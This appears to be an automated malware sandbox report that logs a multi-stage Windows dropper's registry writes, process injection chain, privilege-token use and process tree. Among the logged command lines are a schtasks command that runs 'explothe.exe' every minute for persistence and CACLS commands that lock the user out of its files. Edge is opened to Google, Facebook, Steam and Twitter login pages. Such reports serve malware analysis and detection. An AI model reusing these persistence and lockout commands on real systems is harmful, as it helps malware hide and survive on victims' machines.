Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3584 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe
PID 4036 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe
PID 2236 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe
PID 3824 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe
PID 4240 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe
PID 3196 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe
PID 3152 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3196 wrote to memory of 3760 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe
PID 3760 wrote to memory of 4320 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3760 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4240 wrote to memory of 884 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe
PID 3824 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe
PID 1884 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2236 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe
PID 3756 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 4036 wrote to memory of 3948 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe

"C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3820 -ip 3820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3820 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\88C7.tmp\88C8.tmp\88C9.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x104,0x16c,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb320946f8,0x7ffb32094708,0x7ffb32094718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,6071968293449853800,12518414765028567510,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,15955059388898365744,13462130781041250341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,15955059388898365744,13462130781041250341,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,17081652659181841090,7671802902373533112,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

